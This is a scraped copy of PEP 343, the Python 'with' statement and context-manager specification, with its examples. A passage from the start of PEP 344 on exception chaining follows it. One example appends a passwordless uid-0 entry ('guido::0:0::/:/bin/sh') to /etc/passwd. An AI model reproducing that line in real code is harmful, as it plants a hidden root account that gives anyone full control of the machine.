Type:
+
Standards Track
+
Created:
+
13-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+
02-Jun-2005, 16-Oct-2005, 29-Oct-2005, 23-Apr-2006, 01-May-2006, +30-Jul-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds a new statement “with” to the Python language to make +it possible to factor out standard uses of try/finally statements.

+

In this PEP, context managers provide __enter__() and __exit__() +methods that are invoked on entry to and exit from the body of the +with statement.

+
+
+

Author’s Note

+

This PEP was originally written in first person by Guido, and +subsequently updated by Alyssa (Nick) Coghlan to reflect later discussion +on python-dev. Any first person references are from Guido’s +original.

+

Python’s alpha release cycle revealed terminology problems in this +PEP and in the associated documentation and implementation [13]. +The PEP stabilised around the time of the first Python 2.5 beta +release.

+

Yes, the verb tense is messed up in a few places. We’ve been +working on this PEP for over a year now, so things that were +originally in the future are now in the past :)

+
+
+

Introduction

+

After a lot of discussion about PEP 340 and alternatives, I +decided to withdraw PEP 340 and proposed a slight variant on PEP +310. After more discussion, I have added back a mechanism for +raising an exception in a suspended generator using a throw() +method, and a close() method which throws a new GeneratorExit +exception; these additions were first proposed on python-dev in +[2] and universally approved of. I’m also changing the keyword to +‘with’.

+

After acceptance of this PEP, the following PEPs were rejected due +to overlap:

+
    +
  • PEP 310, Reliable Acquisition/Release Pairs. This is the +original with-statement proposal.
  • +
  • PEP 319, Python Synchronize/Asynchronize Block. Its use cases +can be covered by the current PEP by providing suitable +with-statement controllers: for ‘synchronize’ we can use the +“locking” template from example 1; for ‘asynchronize’ we can use +a similar “unlocking” template. I don’t think having an +“anonymous” lock associated with a code block is all that +important; in fact it may be better to always be explicit about +the mutex being used.
  • +
+

PEP 340 and PEP 346 also overlapped with this PEP, but were +voluntarily withdrawn when this PEP was submitted.

+

Some discussion of earlier incarnations of this PEP took place on +the Python Wiki [3].

+
+
+

Motivation and Summary

+

PEP 340, Anonymous Block Statements, combined many powerful ideas: +using generators as block templates, adding exception handling and +finalization to generators, and more. Besides praise it received +a lot of opposition from people who didn’t like the fact that it +was, under the covers, a (potential) looping construct. This +meant that break and continue in a block-statement would break or +continue the block-statement, even if it was used as a non-looping +resource management tool.

+

But the final blow came when I read Raymond Chen’s rant about +flow-control macros [1]. Raymond argues convincingly that hiding +flow control in macros makes your code inscrutable, and I find +that his argument applies to Python as well as to C. I realized +that PEP 340 templates can hide all sorts of control flow; for +example, its example 4 (auto_retry()) catches exceptions and +repeats the block up to three times.

+

However, the with-statement of PEP 310 does not hide control +flow, in my view: while a finally-suite temporarily suspends the +control flow, in the end, the control flow resumes as if the +finally-suite wasn’t there at all.

+

Remember, PEP 310 proposes roughly this syntax (the “VAR =” part is +optional):

+
with VAR = EXPR:
+    BLOCK
+
+
+

which roughly translates into this:

+
VAR = EXPR
+VAR.__enter__()
+try:
+    BLOCK
+finally:
+    VAR.__exit__()
+
+
+

Now consider this example:

+
with f = open("/etc/passwd"):
+    BLOCK1
+BLOCK2
+
+
+

Here, just as if the first line was “if True” instead, we know +that if BLOCK1 completes without an exception, BLOCK2 will be +reached; and if BLOCK1 raises an exception or executes a non-local +goto (a break, continue or return), BLOCK2 is not reached. The +magic added by the with-statement at the end doesn’t affect this.

+

(You may ask, what if a bug in the __exit__() method causes an +exception? Then all is lost – but this is no worse than with +other exceptions; the nature of exceptions is that they can happen +anywhere, and you just have to live with that. Even if you +write bug-free code, a KeyboardInterrupt exception can still cause +it to exit between any two virtual machine opcodes.)

+

This argument almost led me to endorse PEP 310, but I had one idea +left from the PEP 340 euphoria that I wasn’t ready to drop: using +generators as “templates” for abstractions like acquiring and +releasing a lock or opening and closing a file is a powerful idea, +as can be seen by looking at the examples in that PEP.

+

Inspired by a counter-proposal to PEP 340 by Phillip Eby I tried +to create a decorator that would turn a suitable generator into an +object with the necessary __enter__() and __exit__() methods. +Here I ran into a snag: while it wasn’t too hard for the locking +example, it was impossible to do this for the opening example. +The idea was to define the template like this:

+
@contextmanager
+def opening(filename):
+    f = open(filename)
+    try:
+        yield f
+    finally:
+        f.close()
+
+
+

and used it like this:

+
with f = opening(filename):
+    ...read data from f...
+
+
+

The problem is that in PEP 310, the result of calling EXPR is +assigned directly to VAR, and then VAR’s __exit__() method is +called upon exit from BLOCK1. But here, VAR clearly needs to +receive the opened file, and that would mean that __exit__() would +have to be a method on the file.

+

While this can be solved using a proxy class, this is awkward and +made me realize that a slightly different translation would make +writing the desired decorator a piece of cake: let VAR receive the +result from calling the __enter__() method, and save the value of +EXPR to call its __exit__() method later. Then the decorator can +return an instance of a wrapper class whose __enter__() method +calls the generator’s next() method and returns whatever next() +returns; the wrapper instance’s __exit__() method calls next() +again but expects it to raise StopIteration. (Details below in +the section Optional Generator Decorator.)

+

So now the final hurdle was that the PEP 310 syntax:

+
with VAR = EXPR:
+    BLOCK1
+
+
+

would be deceptive, since VAR does not receive the value of +EXPR. Borrowing from PEP 340, it was an easy step to:

+
with EXPR as VAR:
+    BLOCK1
+
+
+

Additional discussion showed that people really liked being able +to “see” the exception in the generator, even if it was only to +log it; the generator is not allowed to yield another value, since +the with-statement should not be usable as a loop (raising a +different exception is marginally acceptable). To enable this, a +new throw() method for generators is proposed, which takes one to +three arguments representing an exception in the usual fashion +(type, value, traceback) and raises it at the point where the +generator is suspended.

+

Once we have this, it is a small step to proposing another +generator method, close(), which calls throw() with a special +exception, GeneratorExit. This tells the generator to exit, and +from there it’s another small step to proposing that close() be +called automatically when the generator is garbage-collected.

+

Then, finally, we can allow a yield-statement inside a try-finally +statement, since we can now guarantee that the finally-clause will +(eventually) be executed. The usual cautions about finalization +apply – the process may be terminated abruptly without finalizing +any objects, and objects may be kept alive forever by cycles or +memory leaks in the application (as opposed to cycles or leaks in +the Python implementation, which are taken care of by GC).

+

Note that we’re not guaranteeing that the finally-clause is +executed immediately after the generator object becomes unused, +even though this is how it will work in CPython. This is similar +to auto-closing files: while a reference-counting implementation +like CPython deallocates an object as soon as the last reference +to it goes away, implementations that use other GC algorithms do +not make the same guarantee. This applies to Jython, IronPython, +and probably to Python running on Parrot.

+

(The details of the changes made to generators can now be found in +PEP 342 rather than in the current PEP)

+
+
+

Use Cases

+

See the Examples section near the end.

+
+
+

Specification: The ‘with’ Statement

+

A new statement is proposed with the syntax:

+
with EXPR as VAR:
+    BLOCK
+
+
+

Here, ‘with’ and ‘as’ are new keywords; EXPR is an arbitrary +expression (but not an expression-list) and VAR is a single +assignment target. It can not be a comma-separated sequence of +variables, but it can be a parenthesized comma-separated +sequence of variables. (This restriction makes a future extension +possible of the syntax to have multiple comma-separated resources, +each with its own optional as-clause.)

+

The “as VAR” part is optional.

+

The translation of the above statement is:

+
mgr = (EXPR)
+exit = type(mgr).__exit__  # Not calling it yet
+value = type(mgr).__enter__(mgr)
+exc = True
+try:
+    try:
+        VAR = value  # Only if "as VAR" is present
+        BLOCK
+    except:
+        # The exceptional case is handled here
+        exc = False
+        if not exit(mgr, *sys.exc_info()):
+            raise
+        # The exception is swallowed if exit() returns true
+finally:
+    # The normal and non-local-goto cases are handled here
+    if exc:
+        exit(mgr, None, None, None)
+
+
+

Here, the lowercase variables (mgr, exit, value, exc) are internal +variables and not accessible to the user; they will most likely be +implemented as special registers or stack positions.

+

The details of the above translation are intended to prescribe the +exact semantics. If either of the relevant methods are not found +as expected, the interpreter will raise AttributeError, in the +order that they are tried (__exit__, __enter__). +Similarly, if any of the calls raises an exception, the effect is +exactly as it would be in the above code. Finally, if BLOCK +contains a break, continue or return statement, the __exit__() +method is called with three None arguments just as if BLOCK +completed normally. (I.e. these “pseudo-exceptions” are not seen +as exceptions by __exit__().)

+

If the “as VAR” part of the syntax is omitted, the “VAR =” part of +the translation is omitted (but mgr.__enter__() is still called).

+

The calling convention for mgr.__exit__() is as follows. If the +finally-suite was reached through normal completion of BLOCK or +through a non-local goto (a break, continue or return statement in +BLOCK), mgr.__exit__() is called with three None arguments. If +the finally-suite was reached through an exception raised in +BLOCK, mgr.__exit__() is called with three arguments representing +the exception type, value, and traceback.

+

IMPORTANT: if mgr.__exit__() returns a “true” value, the exception +is “swallowed”. That is, if it returns “true”, execution +continues at the next statement after the with-statement, even if +an exception happened inside the with-statement. However, if the +with-statement was left via a non-local goto (break, continue or +return), this non-local return is resumed when mgr.__exit__() +returns regardless of the return value. The motivation for this +detail is to make it possible for mgr.__exit__() to swallow +exceptions, without making it too easy (since the default return +value, None, is false and this causes the exception to be +re-raised). The main use case for swallowing exceptions is to +make it possible to write the @contextmanager decorator so +that a try/except block in a decorated generator behaves exactly +as if the body of the generator were expanded in-line at the place +of the with-statement.

+
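To make the swallowing rule concrete, here is a toy context manager (not from the PEP) whose __exit__() suppresses one specific exception type by returning a true value:

from __future__ import with_statement   # per the Transition Plan below
+
+class suppress_ioerror(object):
+    """Hypothetical: swallow IOError, propagate everything else."""
+    def __enter__(self):
+        return self
+    def __exit__(self, type, value, traceback):
+        # A true result tells the with-statement machinery to swallow
+        # the exception; the default None causes it to be re-raised.
+        return type is not None and issubclass(type, IOError)
+
+with suppress_ioerror():
+    open("/no/such/file")
+print "reached: the IOError was swallowed"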

The motivation for passing the exception details to __exit__(), as +opposed to the argument-less __exit__() from PEP 310, was given by +the transactional() use case, example 3 below. The template in +that example must commit or roll back the transaction depending on +whether an exception occurred or not. Rather than just having a +boolean flag indicating whether an exception occurred, we pass the +complete exception information, for the benefit of an +exception-logging facility for example. Relying on sys.exc_info() +to get at the exception information was rejected; sys.exc_info() +has very complex semantics and it is perfectly possible that it +returns the exception information for an exception that was caught +ages ago. It was also proposed to add an additional boolean to +distinguish between reaching the end of BLOCK and a non-local +goto. This was rejected as too complex and unnecessary; a +non-local goto should be considered unexceptional for the purposes +of a database transaction roll-back decision.

+

To facilitate chaining of contexts in Python code that directly +manipulates context managers, __exit__() methods should not +re-raise the error that is passed in to them. It is always the +responsibility of the caller of the __exit__() method to do any +reraising in that case.

+

That way, if the caller needs to tell whether the __exit__() +invocation failed (as opposed to successfully cleaning up before +propagating the original error), it can do so.

+

If __exit__() returns without an error, this can then be +interpreted as success of the __exit__() method itself (regardless +of whether or not the original error is to be propagated or +suppressed).

+

However, if __exit__() propagates an exception to its caller, this +means that __exit__() itself has failed. Thus, __exit__() +methods should avoid raising errors unless they have actually +failed. (And allowing the original error to proceed isn’t a +failure.)

+
+
+

Transition Plan

+

In Python 2.5, the new syntax will only be recognized if a future +statement is present:

+
from __future__ import with_statement
+
+
+

This will make both ‘with’ and ‘as’ keywords. Without the future +statement, using ‘with’ or ‘as’ as an identifier will cause a +Warning to be issued to stderr.

+

In Python 2.6, the new syntax will always be recognized; ‘with’ +and ‘as’ are always keywords.

+
+
+

Generator Decorator

+

With PEP 342 accepted, it is possible to write a decorator +that makes it possible to use a generator that yields exactly once +to control a with-statement. Here’s a sketch of such a decorator:

+
import sys   # __exit__() below inspects sys.exc_info()
+
+class GeneratorContextManager(object):
+
+   def __init__(self, gen):
+       self.gen = gen
+
+   def __enter__(self):
+       try:
+           return self.gen.next()
+       except StopIteration:
+           raise RuntimeError("generator didn't yield")
+
+   def __exit__(self, type, value, traceback):
+       if type is None:
+           try:
+               self.gen.next()
+           except StopIteration:
+               return
+           else:
+               raise RuntimeError("generator didn't stop")
+       else:
+           try:
+               self.gen.throw(type, value, traceback)
+               raise RuntimeError("generator didn't stop after throw()")
+           except StopIteration:
+               return True
+           except:
+               # only re-raise if it's *not* the exception that was
+               # passed to throw(), because __exit__() must not raise
+               # an exception unless __exit__() itself failed.  But
+               # throw() has to raise the exception to signal
+               # propagation, so this fixes the impedance mismatch
+               # between the throw() protocol and the __exit__()
+               # protocol.
+               #
+               if sys.exc_info()[1] is not value:
+                   raise
+
+def contextmanager(func):
+   def helper(*args, **kwds):
+       return GeneratorContextManager(func(*args, **kwds))
+   return helper
+
+
+

This decorator could be used as follows:

+
@contextmanager
+def opening(filename):
+   f = open(filename) # IOError is untouched by GeneratorContext
+   try:
+       yield f
+   finally:
+       f.close() # Ditto for errors here (however unlikely)
+
+
+

A robust implementation of this decorator will be made +part of the standard library.

+
+
+

Context Managers in the Standard Library

+

It would be possible to endow certain objects, like files, +sockets, and locks, with __enter__() and __exit__() methods so +that instead of writing:

+
with locking(myLock):
+    BLOCK
+
+
+

one could write simply:

+
with myLock:
+    BLOCK
+
+
+

I think we should be careful with this; it could lead to mistakes +like:

+
f = open(filename)
+with f:
+    BLOCK1
+with f:
+    BLOCK2
+
+
+

which does not do what one might think (f is closed before BLOCK2 +is entered).

+

OTOH such mistakes are easily diagnosed; for example, the +generator context decorator above raises RuntimeError when a +second with-statement calls f.__enter__() again. A similar error +can be raised if __enter__ is invoked on a closed file object.

+

For Python 2.5, the following types have been identified as +context managers:

+
- file
+- thread.LockType
+- threading.Lock
+- threading.RLock
+- threading.Condition
+- threading.Semaphore
+- threading.BoundedSemaphore
+
+
+

A context manager will also be added to the decimal module to +support using a local decimal arithmetic context within the body +of a with statement, automatically restoring the original context +when the with statement is exited.

+
+
+

Standard Terminology

+

This PEP proposes that the protocol consisting of the __enter__() +and __exit__() methods be known as the “context management protocol”, +and that objects that implement that protocol be known as “context +managers”. [4]

+

The expression immediately following the with keyword in the +statement is a “context expression” as that expression provides the +main clue as to the runtime environment the context manager +establishes for the duration of the statement body.

+

The code in the body of the with statement and the variable name +(or names) after the as keyword don’t really have special terms at +this point in time. The general terms “statement body” and “target +list” can be used, prefixing with “with” or “with statement” if the +terms would otherwise be unclear.

+

Given the existence of objects such as the decimal module’s +arithmetic context, the term “context” is unfortunately ambiguous. +If necessary, it can be made more specific by using the terms +“context manager” for the concrete object created by the context +expression and “runtime context” or (preferably) “runtime +environment” for the actual state modifications made by the context +manager. When simply discussing use of the with statement, the +ambiguity shouldn’t matter too much as the context expression fully +defines the changes made to the runtime environment. +The distinction is more important when discussing the mechanics of +the with statement itself and how to go about actually implementing +context managers.

+
+
+

Caching Context Managers

+

Many context managers (such as files and generator-based contexts) +will be single-use objects. Once the __exit__() method has been +called, the context manager will no longer be in a usable state +(e.g. the file has been closed, or the underlying generator has +finished execution).

+

Requiring a fresh manager object for each with statement is the +easiest way to avoid problems with multi-threaded code and nested +with statements trying to use the same context manager. It isn’t +coincidental that all of the standard library context managers +that support reuse come from the threading module - they’re all +already designed to deal with the problems created by threaded +and nested usage.

+

This means that in order to save a context manager with particular +initialisation arguments to be used in multiple with statements, it +will typically be necessary to store it in a zero-argument callable +that is then called in the context expression of each statement +rather than caching the context manager directly.

+
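A hypothetical sketch of that pattern, reusing the opened() template defined in the Examples section below:

def passwd_file():
+    return opened("/etc/passwd")   # a fresh single-use manager per call
+
+with passwd_file() as f:
+    first = f.readline()
+with passwd_file() as f:   # safe: a brand-new manager, not a reused one
+    first_again = f.readline()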

When this restriction does not apply, the documentation of the +affected context manager should make that clear.

+
+
+

Resolved Issues

+

The following issues were resolved by BDFL approval (and a lack +of any major objections on python-dev).

+
    +
  1. What exception should GeneratorContextManager raise when the +underlying generator-iterator misbehaves? The following quote is +the reason behind Guido’s choice of RuntimeError for both this +and for the generator close() method in PEP 342 (from [8]):

    “I’d rather not introduce a new exception class just for this +purpose, since it’s not an exception that I want people to catch: +I want it to turn into a traceback which is seen by the +programmer who then fixes the code. So now I believe they +should both raise RuntimeError. +There are some precedents for that: it’s raised by the core +Python code in situations where endless recursion is detected, +and for uninitialized objects (and for a variety of +miscellaneous conditions).”

    +
  2. +
  3. It is fine to raise AttributeError instead of TypeError if the +relevant methods aren’t present on a class involved in a with +statement. The fact that the abstract object C API raises +TypeError rather than AttributeError is an accident of history, +rather than a deliberate design decision [11].
  4. +
  5. Objects with __enter__/__exit__ methods are called “context +managers” and the decorator to convert a generator function +into a context manager factory is contextlib.contextmanager. +There were some other suggestions [15] during the 2.5 release +cycle but no compelling arguments for switching away from the +terms that had been used in the PEP implementation were made.
  6. +
+
+
+

Rejected Options

+

For several months, the PEP prohibited suppression of exceptions +in order to avoid hidden flow control. Implementation +revealed this to be a right royal pain, so Guido restored the +ability [12].

+

Another aspect of the PEP that caused no end of questions and +terminology debates was providing a __context__() method that +was analogous to an iterable’s __iter__() method [5] [7] [9]. +The ongoing problems [10] [12] with explaining what it was and why +it was and how it was meant to work eventually led to Guido +killing the concept outright [14] (and there was much rejoicing!).

+

The notion of using the PEP 342 generator API directly to define +the with statement was also briefly entertained [6], but quickly +dismissed as making it too difficult to write non-generator +based context managers.

+
+
+

Examples

+

The generator based examples rely on PEP 342. Also, some of the +examples are unnecessary in practice, as the appropriate objects, +such as threading.RLock, are able to be used directly in with +statements.

+

The tense used in the names of the example contexts is not +arbitrary. Past tense (“-ed”) is used when the name refers to an +action which is done in the __enter__ method and undone in the +__exit__ method. Progressive tense (“-ing”) is used when the name +refers to an action which is to be done in the __exit__ method.

+
    +
  1. A template for ensuring that a lock, acquired at the start of a +block, is released when the block is left:
    @contextmanager
    +def locked(lock):
    +    lock.acquire()
    +    try:
    +        yield
    +    finally:
    +        lock.release()
    +
    +
    +

    Used as follows:

    +
    with locked(myLock):
    +    # Code here executes with myLock held.  The lock is
    +    # guaranteed to be released when the block is left (even
    +    # if via return or by an uncaught exception).
    +
    +
    +
  2. +
  3. A template for opening a file that ensures the file is closed +when the block is left:
    @contextmanager
    +def opened(filename, mode="r"):
    +    f = open(filename, mode)
    +    try:
    +        yield f
    +    finally:
    +        f.close()
    +
    +
    +

    Used as follows:

    +
    with opened("/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  4. +
  5. A template for committing or rolling back a database +transaction:
    @contextmanager
    +def transaction(db):
    +    db.begin()
    +    try:
    +        yield None
    +    except:
    +        db.rollback()
    +        raise
    +    else:
    +        db.commit()
    +
    +
    +
  6. +
  7. Example 1 rewritten without a generator:
    class locked:
    +   def __init__(self, lock):
    +       self.lock = lock
    +   def __enter__(self):
    +       self.lock.acquire()
    +   def __exit__(self, type, value, tb):
    +       self.lock.release()
    +
    +
    +

    (This example is easily modified to implement the other +relatively stateless examples; it shows that it is easy to avoid +the need for a generator if no special state needs to be +preserved.)

    +
  8. +
  9. Redirect stdout temporarily:
    @contextmanager
    +def stdout_redirected(new_stdout):
    +    save_stdout = sys.stdout
    +    sys.stdout = new_stdout
    +    try:
    +        yield None
    +    finally:
    +        sys.stdout = save_stdout
    +
    +
    +

    Used as follows:

    +
    with opened(filename, "w") as f:
    +    with stdout_redirected(f):
    +        print "Hello world"
    +
    +
    +

    This isn’t thread-safe, of course, but neither is doing this +same dance manually. In single-threaded programs (for example, +in scripts) it is a popular way of doing things.

    +
  10. +
  11. A variant on opened() that also returns an error condition:
    @contextmanager
    +def opened_w_error(filename, mode="r"):
    +    try:
    +        f = open(filename, mode)
    +    except IOError, err:
    +        yield None, err
    +    else:
    +        try:
    +            yield f, None
    +        finally:
    +            f.close()
    +
    +
    +

    Used as follows:

    +
    with opened_w_error("/etc/passwd", "a") as (f, err):
    +    if err:
    +        print "IOError:", err
    +    else:
    +        f.write("guido::0:0::/:/bin/sh\n")
    +
    +
    +
  12. +
  13. Another useful example would be an operation that blocks +signals. The use could be like this:
    import signal
    +
    +with signal.blocked():
    +    # code executed without worrying about signals
    +
    +
    +

    An optional argument might be a list of signals to be blocked; +by default all signals are blocked. The implementation is left +as an exercise to the reader.

    +
  14. +
  15. Another use for this feature is the Decimal context. Here’s a +simple example, after one posted by Michael Chermside:
    import decimal
    +
    +@contextmanager
    +def extra_precision(places=2):
    +    c = decimal.getcontext()
    +    saved_prec = c.prec
    +    c.prec += places
    +    try:
    +        yield None
    +    finally:
    +        c.prec = saved_prec
    +
    +
    +

    Sample usage (adapted from the Python Library Reference):

    +
    def sin(x):
    +    "Return the sine of x as measured in radians."
    +    with extra_precision():
    +        i, lasts, s, fact, num, sign = 1, 0, x, 1, x, 1
    +        while s != lasts:
    +            lasts = s
    +            i += 2
    +            fact *= i * (i-1)
    +            num *= x * x
    +            sign *= -1
    +            s += num / fact * sign
    +    # The "+s" rounds back to the original precision,
    +    # so this must be outside the with-statement:
    +    return +s
    +
    +
    +
  16. +
  17. Here’s a simple context manager for the decimal module:
    @contextmanager
    +def localcontext(ctx=None):
    +    """Set a new local decimal context for the block"""
    +    # Default to using the current context
    +    if ctx is None:
    +        ctx = getcontext()
    +    # We set the thread context to a copy of this context
    +    # to ensure that changes within the block are kept
    +    # local to the block.
    +    newctx = ctx.copy()
    +    oldctx = decimal.getcontext()
    +    decimal.setcontext(newctx)
    +    try:
    +        yield newctx
    +    finally:
    +        # Always restore the original context
    +        decimal.setcontext(oldctx)
    +
    +
    +

    Sample usage:

    +
    from decimal import localcontext, ExtendedContext
    +
    +def sin(x):
    +    with localcontext() as ctx:
    +        ctx.prec += 2
    +        # Rest of sin calculation algorithm
    +        # uses a precision 2 greater than normal
    +    return +s # Convert result to normal precision
    +
    +def sin(x):
    +    with localcontext(ExtendedContext):
    +        # Rest of sin calculation algorithm
    +        # uses the Extended Context from the
    +        # General Decimal Arithmetic Specification
    +    return +s # Convert result to normal context
    +
    +
    +
  18. +
  19. A generic “object-closing” context manager:
    class closing(object):
    +    def __init__(self, obj):
    +        self.obj = obj
    +    def __enter__(self):
    +        return self.obj
    +    def __exit__(self, *exc_info):
    +        try:
    +            close_it = self.obj.close
    +        except AttributeError:
    +            pass
    +        else:
    +            close_it()
    +
    +
    +

    This can be used to deterministically close anything with a +close method, be it file, generator, or something else. It +can even be used when the object isn’t guaranteed to require +closing (e.g., a function that accepts an arbitrary +iterable):

    +
    # emulate opening():
    +with closing(open("argument.txt")) as contradiction:
    +   for line in contradiction:
    +       print line
    +
    +# deterministically finalize an iterator:
    +with closing(iter(data_source)) as data:
    +   for datum in data:
    +       process(datum)
    +
    +
    +

    (Python 2.5’s contextlib module contains a version +of this context manager)

    +
  20. +
  21. PEP 319 gives a use case for also having a released() +context to temporarily release a previously acquired lock; +this can be written very similarly to the locked context +manager above by swapping the acquire() and release() calls:
    class released:
    +  def __init__(self, lock):
    +      self.lock = lock
    +  def __enter__(self):
    +      self.lock.release()
    +  def __exit__(self, type, value, tb):
    +      self.lock.acquire()
    +
    +
    +

    Sample usage:

    +
    with my_lock:
    +    # Operations with the lock held
    +    with released(my_lock):
    +        # Operations without the lock
    +        # e.g. blocking I/O
    +    # Lock is held again here
    +
    +
    +
  22. +
  23. A “nested” context manager that automatically nests the +supplied contexts from left-to-right to avoid excessive +indentation:
    @contextmanager
    +def nested(*contexts):
    +    exits = []
    +    vars = []
    +    try:
    +        try:
    +            for context in contexts:
    +                exit = context.__exit__
    +                enter = context.__enter__
    +                vars.append(enter())
    +                exits.append(exit)
    +            yield vars
    +        except:
    +            exc = sys.exc_info()
    +        else:
    +            exc = (None, None, None)
    +    finally:
    +        while exits:
    +            exit = exits.pop()
    +            try:
    +                exit(*exc)
    +            except:
    +                exc = sys.exc_info()
    +            else:
    +                exc = (None, None, None)
    +        if exc != (None, None, None):
    +            # sys.exc_info() may have been
    +            # changed by one of the exit methods
    +            # so provide explicit exception info
    +            raise exc[0], exc[1], exc[2]
    +
    +
    +

    Sample usage:

    +
    with nested(a, b, c) as (x, y, z):
    +    # Perform operation
    +
    +
    +

    Is equivalent to:

    +
    with a as x:
    +    with b as y:
    +        with c as z:
    +            # Perform operation
    +
    +
    +

    (Python 2.5’s contextlib module contains a version +of this context manager)

    +
  24. +
+
+
+

Reference Implementation

+

This PEP was first accepted by Guido at his EuroPython +keynote, 27 June 2005. +It was accepted again later, with the __context__ method added. +The PEP was implemented in Subversion for Python 2.5a1 +The __context__() method was removed in Python 2.5b1

+
+
+

Acknowledgements

+

Many people contributed to the ideas and concepts in this PEP, +including all those mentioned in the acknowledgements for PEP 340 +and PEP 346.

+

Additional thanks goes to (in no meaningful order): Paul Moore, +Phillip J. Eby, Greg Ewing, Jason Orendorff, Michael Hudson, +Raymond Hettinger, Walter Dörwald, Aahz, Georg Brandl, Terry Reedy, +A.M. Kuchling, Brett Cannon, and all those that participated in the +discussions on python-dev.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0343.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0344/index.html b/pep-0344/index.html new file mode 100644 index 00000000000..f222c1aba14 --- /dev/null +++ b/pep-0344/index.html @@ -0,0 +1,649 @@ + PEP 344 – Exception Chaining and Embedded Tracebacks | peps.python.org +
+
+


+ + +
+
+
+

PEP 344 – Exception Chaining and Embedded Tracebacks

+
+
Author:
+
Ka-Ping Yee
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
12-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
+
+

Numbering Note

+

This PEP has been renumbered to PEP 3134. The text below is the last version +submitted under the old number.

+
+
+

Abstract

+

This PEP proposes three standard attributes on exception instances: the +__context__ attribute for implicitly chained exceptions, the +__cause__ attribute for explicitly chained exceptions, and the +__traceback__ attribute for the traceback. A new raise ... from +statement sets the __cause__ attribute.

+
+
+

Motivation

+

During the handling of one exception (exception A), it is possible that another +exception (exception B) may occur. In today’s Python (version 2.4), if this +happens, exception B is propagated outward and exception A is lost. In order +to debug the problem, it is useful to know about both exceptions. The +__context__ attribute retains this information automatically.

+

Sometimes it can be useful for an exception handler to intentionally re-raise +an exception, either to provide extra information or to translate an exception +to another type. The __cause__ attribute provides an explicit way to +record the direct cause of an exception.

+

In today’s Python implementation, exceptions are composed of three parts: the +type, the value, and the traceback. The sys module exposes the current +exception in three parallel variables, exc_type, exc_value, and +exc_traceback, the sys.exc_info() function returns a tuple of these +three parts, and the raise statement has a three-argument form accepting +these three parts. Manipulating exceptions often requires passing these three +things in parallel, which can be tedious and error-prone. Additionally, the +except statement can only provide access to the value, not the traceback. +Adding the __traceback__ attribute to exception values makes all the +exception information accessible from a single place.

+
+
+

History

+

Raymond Hettinger [1] raised the issue of masked exceptions on Python-Dev in +January 2003 and proposed a PyErr_FormatAppend() function that C modules +could use to augment the currently active exception with more information. +Brett Cannon [2] brought up chained exceptions again in June 2003, prompting +a long discussion.

+

Greg Ewing [3] identified the case of an exception occurring in a finally +block during unwinding triggered by an original exception, as distinct from +the case of an exception occurring in an except block that is handling the +original exception.

+

Greg Ewing [4] and Guido van Rossum [5], and probably others, have +previously mentioned adding a traceback attribute to Exception instances. +This is noted in PEP 3000.

+

This PEP was motivated by yet another recent Python-Dev reposting of the same +ideas [6] [7].

+
+
+

Rationale

+

The Python-Dev discussions revealed interest in exception chaining for two +quite different purposes. To handle the unexpected raising of a secondary +exception, the exception must be retained implicitly. To support intentional +translation of an exception, there must be a way to chain exceptions +explicitly. This PEP addresses both.

+

Several attribute names for chained exceptions have been suggested on +Python-Dev [2], including cause, antecedent, reason, original, +chain, chainedexc, xc_chain, excprev, previous and +precursor. For an explicitly chained exception, this PEP suggests +__cause__ because of its specific meaning. For an implicitly chained +exception, this PEP proposes the name __context__ because the intended +meaning is more specific than temporal precedence but less specific than +causation: an exception occurs in the context of handling another exception.

+

This PEP suggests names with leading and trailing double-underscores for these +three attributes because they are set by the Python VM. Only in very special +cases should they be set by normal assignment.

+

This PEP handles exceptions that occur during except blocks and +finally blocks in the same way. Reading the traceback makes it clear +where the exceptions occurred, so additional mechanisms for distinguishing +the two cases would only add unnecessary complexity.

+

This PEP proposes that the outermost exception object (the one exposed for +matching by except clauses) be the most recently raised exception for +compatibility with current behaviour.

+

This PEP proposes that tracebacks display the outermost exception last, +because this would be consistent with the chronological order of tracebacks +(from oldest to most recent frame) and because the actual thrown exception is +easier to find on the last line.

+

To keep things simpler, the C API calls for setting an exception will not +automatically set the exception’s __context__. Guido van Rossum has +expressed concerns with making such changes [8].

+

As for other languages, Java and Ruby both discard the original exception when +another exception occurs in a catch/rescue or finally/ensure clause. +Perl 5 lacks built-in structured exception handling. For Perl 6, RFC number +88 [9] proposes an exception mechanism that implicitly retains chained +exceptions in an array named @@. In that RFC, the most recently raised +exception is exposed for matching, as in this PEP; also, arbitrary expressions +(possibly involving @@) can be evaluated for exception matching.

+

Exceptions in C# contain a read-only InnerException property that may +point to another exception. Its documentation [10] says that “When an +exception X is thrown as a direct result of a previous exception Y, the +InnerException property of X should contain a reference to Y.” This +property is not set by the VM automatically; rather, all exception +constructors take an optional innerException argument to set it +explicitly. The __cause__ attribute fulfills the same purpose as +InnerException, but this PEP proposes a new form of raise rather than +extending the constructors of all exceptions. C# also provides a +GetBaseException method that jumps directly to the end of the +InnerException chain; this PEP proposes no analog.

+

The reason all three of these attributes are presented together in one proposal +is that the __traceback__ attribute provides convenient access to the +traceback on chained exceptions.

+
+
+

Implicit Exception Chaining

+

Here is an example to illustrate the __context__ attribute:

+
def compute(a, b):
+    try:
+        a/b
+    except Exception, exc:
+        log(exc)
+
+def log(exc):
+    file = open('logfile.txt')  # oops, forgot the 'w'
+    print >>file, exc
+    file.close()
+
+
+

Calling compute(0, 0) causes a ZeroDivisionError. The compute() +function catches this exception and calls log(exc), but the log() +function also raises an exception when it tries to write to a file that wasn’t +opened for writing.

+

In today’s Python, the caller of compute() gets thrown an IOError. The +ZeroDivisionError is lost. With the proposed change, the instance of +IOError has an additional __context__ attribute that retains the +ZeroDivisionError.

+

The following more elaborate example demonstrates the handling of a mixture of +finally and except clauses:

+
def main(filename):
+    file = open(filename)       # oops, forgot the 'w'
+    try:
+        try:
+            compute()
+        except Exception, exc:
+            log(file, exc)
+        finally:
+            file.clos()         # oops, misspelled 'close'
+
+def compute():
+    1/0
+
+def log(file, exc):
+    try:
+        print >>file, exc       # oops, file is not writable
+    except:
+        display(exc)
+
+def display(exc):
+    print ex                    # oops, misspelled 'exc'
+
+
+

